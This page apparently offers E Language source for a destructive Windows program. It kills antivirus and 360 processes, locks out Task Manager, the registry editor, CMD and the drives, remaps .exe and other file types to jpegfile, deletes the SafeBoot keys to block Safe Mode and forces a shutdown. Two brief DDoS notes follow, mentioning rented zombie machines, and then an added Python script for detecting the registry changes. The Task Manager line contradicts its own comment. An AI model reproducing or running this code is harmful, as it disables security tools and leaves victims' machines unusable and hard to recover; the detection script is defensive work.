.版本 2
.支持库 shell
.程序集 窗口程序集1
.子程序 _按钮1_被单击

' Bypass antivirus defenses:
运行 (“taskkill /f /im kavsvc.exe”, 假, 1)
运行 (“taskkill /f /im KVXP.kxp”, 假, 1)
运行 (“taskkill /f /im Rav.exe”, 假, 1)
运行 (“taskkill /f /im Ravmon.exe”, 假, 1)
运行 (“taskkill /f /im Mcshield.exe”, 假, 1)
运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)
' Change the system time:
置现行时间 (到时间 (“8888年8月8日”))
' Disable Task Manager:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0)
' Disable the registry editor:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1)
' Hide Run in the Start menu; prevent WIN2000/XP from creating new tasks via Task Manager:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1)
' Hide disk drives in "MS-DOS mode"; they are no longer visible in "My Computer" or in "MS-DOS" mode:
写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)
' Hide Shut Down in the Start menu:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)
' Hide Search in the Start menu:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1)
' Overcome 360 defenses:
写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)
写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)
' End the 360 process
运行 (“taskkill /f /im 360tray.exe”, 假, 1)
' Hide all drives:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295)
' Block access to all drives:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295)
' Hide Folder Options:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1)
' Hide desktop objects:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1)
' Hide Shut Down in the Start menu:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)
' Hide Search in the Start menu:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1)
' This one has two cases: 1 disables CMD and .BAT files, 2 disables CMD but not .BAT; 0 enables both
写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)
' Hide the home page options group:
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1)
' Hide the IE File menu:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1)
' Hide the Favorites menu:
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1)
' Disable IE printing:
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1)
' Hide Internet Options:
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1)
' Prevent IE from viewing page source:
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1)
' Disable IE downloads:
写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3)
' Disable the right-click context menu:
写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1)
' Change file associations:
写注册项 (1, “.txt\”, “jpegfile”)
写注册项 (1, “.inf\”, “jpegfile”)
写注册项 (1, “.reg\”, “jpegfile”)
写注册项 (1, “.exe\”, “jpegfile”)
' Prevent booting into Safe Mode:
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)
' Shut down:
关闭系统 (2, 真)

1. A distributed denial-of-service (DDoS: Distributed Denial of Service) attack uses client/server technology to combine multiple computers into an attack platform that launches a DDoS attack against one or more targets.
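2. Put simply, this is mainly because of the TCP three-way handshake: one can therefore keep changing IP addresses to connect to the server, or own a large number of zombie machines. I have previously come across someone who rented them.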
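
The registry policy writes and file-association changes in the listing above leave values that a responder can look for in a `reg export` of the affected hives. The following is an added detection example, not part of the original page; it assumes the listing's root constants 3 and 1 mean HKEY_CURRENT_USER and HKEY_CLASSES_ROOT, the function name `scan_reg_export` is hypothetical, and the sample export is constructed.

```python
import re

# Value names from the listing above; a non-zero DWORD removes a recovery tool.
WATCHED = {
    r"policies\system": {"disabletaskmgr", "disableregistrytools"},
    r"policies\explorer": {"norun", "noclose", "nofind", "nodrives",
                           "noviewondrive", "nofolderoptions", "nodesktop"},
    r"policies\microsoft\windows\system": {"disablecmd"},
}
# Stock default handlers for the extensions the listing reassigns.
EXPECTED_CLASS = {".exe": "exefile", ".txt": "txtfile",
                  ".reg": "regfile", ".inf": "inffile"}

SECTION = re.compile(r"^\[(.+)\]$")
DWORD = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')
DEFAULT = re.compile(r'^@="(.*)"$')

def scan_reg_export(text):
    """Return (key, value name, data) for each suspicious entry in decoded .reg text."""
    findings, key = [], ""
    for line in map(str.strip, text.splitlines()):
        if m := SECTION.match(line):
            key = m.group(1)
        elif m := DWORD.match(line):
            name, data = m.group(1), int(m.group(2), 16)
            for suffix, names in WATCHED.items():
                if data and key.lower().endswith(suffix) and name.lower() in names:
                    findings.append((key, name, data))
        elif m := DEFAULT.match(line):
            root, _, ext = key.lower().rpartition("\\")
            want = EXPECTED_CLASS.get(ext) if root == "hkey_classes_root" else None
            if want and m.group(1).lower() != want:
                findings.append((key, "(Default)", m.group(1)))
    return findings

# Constructed sample export (not captured from a real host).
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:ffffffff
[HKEY_CLASSES_ROOT\.exe]
@="jpegfile"
[HKEY_CLASSES_ROOT\.txt]
@="txtfile"
'''
```

Real `reg export` files are UTF-16, so decode them before passing the text in; a missing `SafeBoot` key has to be checked separately, since an export only lists what still exists.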